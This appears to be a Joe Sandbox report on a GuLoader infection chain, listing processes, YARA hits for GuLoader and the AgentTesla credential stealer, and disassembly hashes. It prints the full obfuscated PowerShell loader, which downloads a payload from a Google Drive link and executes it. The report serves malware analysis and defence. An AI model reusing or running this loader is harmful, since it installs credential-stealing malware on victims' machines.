ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;"
                                                                                Imagebase:0x7ff7be880000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2687361282.000001D6D36DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:3
                                                                                Start time:08:04:51
                                                                                Start date:23/04/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:4
                                                                                Start time:08:04:53
                                                                                Start date:23/04/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
                                                                                Imagebase:0x7ff60b260000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:5
                                                                                Start time:08:04:59
                                                                                Start date:23/04/2024
                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed.an.nised.chize ranrNonchnAmbide Miscs Ox,p= apis$ GudeSS,cleoSelvsc NunqiMa,heoTuf inPreinoPighemUnapps trkm.Fe ies,rydepUnm,sl StjfiUskoltmicro(Link $ KoncARuskunSrg.tsJibbokUnquaaCloudfProduf BesieBjarkl L stsPreeleRecipsHlifss BrneuAflevm VirtmSuggeeStellrOvicanAri neLvfal)Oxidi ');$Socionoms=$Aftalekalendernes[0];Infatuatedly (Preinterceded 'Eryth$F ivigIrritlS,illoP otobTuberaplankl Buc,:ChuzwhKedsoiBile t .isctDegage.ysteb St.la pmar .enenFortr= GuatNaposteRestpwSemia-E,terOKino,bPerlajOm edeStorhcdrawltPyope KnivsSNorfoyKapunsNon otIntegeAphi mF ran.SalpeNHovede dr.otSpace.Me,neWsyndieNonsebDiamaC L.scl I,veiPolyseS ilonAnusitEgafa ');Infatuatedly (Preinterceded ' Poly$UmttehLymphi Un.stSulphtUptowe Darwb .ortaBrincrUdestn.rogm.ProtaHOppreeunhinacha rd obs.eBruttr Nonvs Clea[Hool.$RandpS Overe .ccev OplaeHop,enHy rib,preyoRup cmEx.edmCommee TiptnfoliasDomin]Misen=Prefe$SangeI Fl,rnTankedCowtokEthnonFishbeMis ubM,llenRebelecemens Forh ');$Istandsat=Preinterceded 'Underhformaiuud rtKretjt Slriescincbp,ckeaFuldtrAn.canSubdi.Gono.DFraenoSorrewWildwn mganl lopoVa,slaBrei dReconFMisbiiCond,l ormoeRheol(Idio.$StarlSUnin.oudbrncsp seiSa,anoLuftanVandkoOverlmKalifsSe,ti,Conka$MalleKSmm,noAlpehgHaande ChurcVe.sehUngovoRettekRegiso Al.ilHi loaKanond Fod.e disls.ugle) Katt ';$Istandsat=$Boltant[1]+$Istandsat;$Kogechokolades=$Boltant[0];Infatuatedly (Preinterceded 'Pyrag$ Deklgsubf,lPar,ooBortlb Tilta omlalUncau: St.eKUr.erafor utCh,vyaFlod l IndfoAffalg Dem,sOo.enaA,atrlAgni,gAmtsr=Syvaa( flleTHyrenerabars Di otIn ra- Co.rP ,estaMassatProtohFirol Tvrr$Arm,nKMi pro AecigOverteOstl,c GynkhMic ro,ntiakPr.suota.telToleraRyatpd u.emeThorosDomme)Overv ');while (!$Katalogsalg) {Infatuatedly (Preinterceded 'Story$Wi,teg.lirtlPyelioYomasbKlappaKagenl,orfa:Ba isS The.ydekasdFixetsembe,yBegl.dAktivsKundetTi.sm=S.ele$PyrogtSy,efrDo,sauAuranePlati ') ;Infatuatedly $Istandsat;Infatuatedly (Preinterceded 'BenziS,andjtStorsaRehabrInerttTile.-SukkeSFil.plkvanteElgkeePo.yapMe al vangu4Unall ');Infatuatedly (Preinterceded 'tkk.l$Halvfg achilPu.esoM.nasbKultuaC,rkulPromo: CymrKLascaaHona tConsaa UdkilBruseohemidgChelos rangaCopollVitisgMelle=ambi ( InteTLuri,eContesCensotUnp.r-Un,erP ndeaFilmet OpsphBl,es Inte$ OverKErklroballagHjbaaeDissecGealah s enoEskalkCrownoPreinl Lysba Sar.d T icen,acis Frot)J,gte ') ;Infatuatedly (Preinterceded 'Besid$Im.erg Scoulma.iroAftrybNonadakontrl,rand:UlydiUKorsfnJere ipl,venE.sistNrbilePsychrRetirrA satuMetr pA tentOf.eniBallobEgenalOver,eBaand=Antep$U,gengVeikklCockhoRkefjbMi,roaVei ul Gylp:S,ineA ConsnImpa.pFinanrEtkamiBa tisBenzieFatal+Udlb.+,redb%Per,b$MisapAI dtafEnebrtTabstaRgerslMethaeFejlakSte.ma Conel undeeTorr,n Ob,edGaroteDup,rrKon.in NabieInfors back.Tra tcNy,phoNo,couBr.denPh.lut Deni ') ;$Socionoms=$Aftalekalendernes[$Uninterruptible];}Infatuatedly (Preinterceded 'hoved$ StypgSlutklFravro UncobbyzanaDoli l Mort:HorizUTeleonLydmsrSynsbem,rsis PrenoGr,vcu Semir BibecUpa re WrinfViktuu,redelAmbo. anap=perso MulatGph loeKbst,tShrin-OverrCNondio,adianRo bet,illae SelvnKonomtub hv F.dig$Excl.KAkneeoAugusgBilleeOpr.acKrokehInstaoMistnk SomeoO.brylRevisaFejltdInspeeDuanesSt.yg ');Infatuatedly (Preinterceded 'Sove $.ertigIdol,l Tre o Colob Banka Stl l flos:PyramSCr,bct SpadaN rromSad.ehSammeeOpvejrPyro rTilreeRddikr koeksCompl Brugb=Eriks R.lat[ S,anSChoriyPyrrhsPreamtPri,tevocatmSkriv. Gad,Cw.zaroBemynnB,shhv urlePrsidr VinftStile]Nonau:Sogn :AttacFAnonyrReni.oBefalm emonBTitiaaHedersLicheeTrmlk6hyalo4poverSPactotRumforUnderiLuskyn Roueg Nitr(Ise t$,agsrUUforan SkamrI,nateBlad,s anjaoContruNeoplrJalurc Mi.eeQuartfforejuTril,l,rigr)Semin ');Infatuatedly (Preinterceded 'Celt.$AntisgRewaxlFjer.oKarenbU sknaValnelGnier:BogyiEJu,ilvOmsonaLikvipTummeoN lghrVengeezy.omr,lluseUng.ln ljlsdF.rtseRdby. Ind s=Smrer Re li[C nneS Fogry,eimpsVi,kotToejleGuttam Scam.Dida.TWardeeSoundxQuiputFleks.Milk EKonomnProgycmariaoDestidSkidtiUnikun Krakgblrpr]Unb m: El.n:ToryiA HavmSHakutC vetuITypifIA.dri.PromiGMattoesqueatE terS.arretnonrerrundmiRese nR,bieg Sil.(Eulo.$FootsSR,erbt Tryka Sprom Jagthinkore Inder nforTh.naeOverfremanes Zion).otes ');Infatuatedly (Preinterceded 'I.per$ForflgGesnelBrndboReje bSkridaU,canl Arki:P.andR CodeeindbevDeploi FunglFlirti ,eminHyperg Cont=defin$EkspoEOv.rvv FlagaSp,rrpFer,io SamlrCrysteS.ottr,pnoeeKlstrnVersfd,orddeTva,g.DiddesMikroufigetbLrerssSulfotForskrK,lvei Mul.ngeorggOverr( Tyro2Extri9Balne5halva9Pe.cu7Hoved3Udspr,tilst2 Mill8Foder4De,ti4Flyka7Joker)Altin ');Infatuatedly $Reviling;"
                                                                                Imagebase:0x7a0000
                                                                                File size:433'152 bytes
                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2423205589.0000000008930000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000005.00000002.2415922796.0000000005C82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2423592720.000000000C494000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:6
                                                                                Start time:08:05:00
                                                                                Start date:23/04/2024
                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Myxogaster.Opv && echo $"
                                                                                Imagebase:0x790000
                                                                                File size:236'544 bytes
                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:8
                                                                                Start time:08:05:21
                                                                                Start date:23/04/2024
                                                                                Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                Imagebase:0x7b0000
                                                                                File size:516'608 bytes
                                                                                MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296966087.0000000023987000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3296966087.0000000023961000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Executed Functions

                                                                                  Function 00007FF848F4CED6 Relevance: .5, Instructions: 474COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2715378833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 982ab424b86fa314b65ddf93d079ded1b44c2a6866e4da8d47047d05817b68f6
                                                                                  • Instruction ID: 075d3379a3745cc5a60d81817e9ca35040af004c7932c25376c7ad594b7c9ce1
                                                                                  • Opcode Fuzzy Hash: 982ab424b86fa314b65ddf93d079ded1b44c2a6866e4da8d47047d05817b68f6
                                                                                  • Instruction Fuzzy Hash: 11F1833090CA4D8FEBA8EF28D8557E937E1FF64350F04426EE84DC7295DB3899458B86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00007FF848F4DC82 Relevance: .5, Instructions: 460COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2715378833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d070f04e27576c3406bbe5292b8e758b3b80512915ed5b3186422aef63efe535
                                                                                  • Instruction ID: 6a858e0ff92dc051bdbcfa45a5f0602826fccc24fa855ab7fae2188d79e05379
                                                                                  • Opcode Fuzzy Hash: d070f04e27576c3406bbe5292b8e758b3b80512915ed5b3186422aef63efe535
                                                                                  • Instruction Fuzzy Hash: C4E1B13090CA4D8FEBA8EF28C8557E977E1FF64750F04426EE84DC7295DB78A9448B81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00007FF849014A75 Relevance: .4, Instructions: 426COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2717011118.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff849010000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 967803d940c36e852b845121617e12827d58d84f1d47ae90de3ffb12378ed30c
                                                                                  • Instruction ID: d1a653194d4b8be198da4d49d53f18786666d3e43dca484ea5d23ea9ceb2e4b2
                                                                                  • Opcode Fuzzy Hash: 967803d940c36e852b845121617e12827d58d84f1d47ae90de3ffb12378ed30c
                                                                                  • Instruction Fuzzy Hash: 0AD12531E0EACA9FEBA5EF2858565B5BBE1FF15391F1800FAD00DC70A3EA19D8458351
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00007FF848F43945 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2715378833.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ff848f40000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                  • Instruction ID: 6844502bb12e6936a31c054fe55ce34861744de46e0db52a3f4fb09dbe218d9a
                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                  • Instruction Fuzzy Hash: D001677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  Function 07758898 Relevance: 26.0, Strings: 20, Instructions: 1042COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$(fll$(fll$(fll$(fll$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$x.]k$-]k
                                                                                  • API String ID: 0-3710717440
                                                                                  • Opcode ID: 8eaa6eda7c653c31149a825ba829bff757883216784c9f3dc94d970b67c2e78f
                                                                                  • Instruction ID: 4eb45dce29ef01d0eeab1ee07325b3e471dc694f36357f9a6a51045b51dc4c9c
                                                                                  • Opcode Fuzzy Hash: 8eaa6eda7c653c31149a825ba829bff757883216784c9f3dc94d970b67c2e78f
                                                                                  • Instruction Fuzzy Hash: DF9292B0B00305DFDB24DB68C950BAABBB6EF85340F14886AD9059B355CB75EC45CF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775E0E5 Relevance: 22.0, Strings: 17, Instructions: 704COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$x.]k$x.]k$x.]k$-]k$-]k
                                                                                  • API String ID: 0-251684200
                                                                                  • Opcode ID: cfe0a39f3113d3ee49ca5ee0480ac857bd5dcfcabff34bcd6e1eddf83058328e
                                                                                  • Instruction ID: 3a28cf544ffd77c9f9069ccc5926e0541b350291e0b969ddbec2fb018a21bd8a
                                                                                  • Opcode Fuzzy Hash: cfe0a39f3113d3ee49ca5ee0480ac857bd5dcfcabff34bcd6e1eddf83058328e
                                                                                  • Instruction Fuzzy Hash: EC6260B4A002189FD724DB68C951BEEBBB2FF84304F1085D9D9096B355CB729E85CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07755B48 Relevance: 15.5, Strings: 12, Instructions: 453COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-78369665
                                                                                  • Opcode ID: 5dbc0b538e74c2ff57998390b94628b6f5fc82262efb6fcf5171073af2545283
                                                                                  • Instruction ID: e34839cd436590ae9148c53f3798991270db908b5804c5ac7b3bd25ecff6b5d5
                                                                                  • Opcode Fuzzy Hash: 5dbc0b538e74c2ff57998390b94628b6f5fc82262efb6fcf5171073af2545283
                                                                                  • Instruction Fuzzy Hash: F9E149B1704346CFCB158F38C85467ABBA2EF82750F1488ABDC45CB291DBB5C865C7A1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07757728 Relevance: 11.7, Strings: 9, Instructions: 466COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$84jl$84jl$tP]q$tP]q$x.]k
                                                                                  • API String ID: 0-1262048826
                                                                                  • Opcode ID: 2fcb7a77a7cf6a91bb74206155630eeab42cea109a6e9e077becf358a273d68a
                                                                                  • Instruction ID: 54ddd499545456a91e8013e4f80579f744ca160ecc2fa8aa01b0040d1ad2a804
                                                                                  • Opcode Fuzzy Hash: 2fcb7a77a7cf6a91bb74206155630eeab42cea109a6e9e077becf358a273d68a
                                                                                  • Instruction Fuzzy Hash: 5E02C1B0B102059FC718DF68C551BAABBE6EF85350F148869D805AF351CBB2EC45CBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07757D70 Relevance: 10.7, Strings: 8, Instructions: 741COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll$(fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-3628354984
                                                                                  • Opcode ID: ad97aaa5497defb90e9448c5be4dfe1b1d5d3480ccf4b8eb67c6a4515fd7f653
                                                                                  • Instruction ID: e9783bb98f0d0bea28b4c1e96b0d2e496ec760b3f9b3fdb089938717b61d0e56
                                                                                  • Opcode Fuzzy Hash: ad97aaa5497defb90e9448c5be4dfe1b1d5d3480ccf4b8eb67c6a4515fd7f653
                                                                                  • Instruction Fuzzy Hash: AA625BB4B002058FDB14CBA8C555A6ABBB2FF84344F24C569D9099F355CBB2EC46CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775A308 Relevance: 10.3, Strings: 8, Instructions: 339COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$x.]k$-]k
                                                                                  • API String ID: 0-3219672615
                                                                                  • Opcode ID: d4d97817d2e9629d52ce947d9c26a594d937d99745a876723202a1ef1234084d
                                                                                  • Instruction ID: 8b5345fba0babc9abb4e8ded14fc4eed0c8405dbdec1fc5c954e8bebcbe43bb5
                                                                                  • Opcode Fuzzy Hash: d4d97817d2e9629d52ce947d9c26a594d937d99745a876723202a1ef1234084d
                                                                                  • Instruction Fuzzy Hash: DDD1B4B4B502058FC718DFA8C551BAEBBA2EF84344F12C929D9016F355CBB6DC46CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077592AB Relevance: 9.1, Strings: 7, Instructions: 387COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$4']q$4']q$x.]k$x.]k$-]k
                                                                                  • API String ID: 0-495288179
                                                                                  • Opcode ID: 9c988f1495c375fa4f264f31248a5fcf209f8b24a78024470ac1d7ef18737d27
                                                                                  • Instruction ID: 713b3c5ea4312aa4624aac8a0ab188a421df9af4184ce6dd11a7fe3ad6f9680f
                                                                                  • Opcode Fuzzy Hash: 9c988f1495c375fa4f264f31248a5fcf209f8b24a78024470ac1d7ef18737d27
                                                                                  • Instruction Fuzzy Hash: 9FF1A0B0B402158FDB24DB18C951BAABBA3EF84300F10C899D909AB795CB75ED85CF52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775F519 Relevance: 7.9, Strings: 6, Instructions: 397COMMON
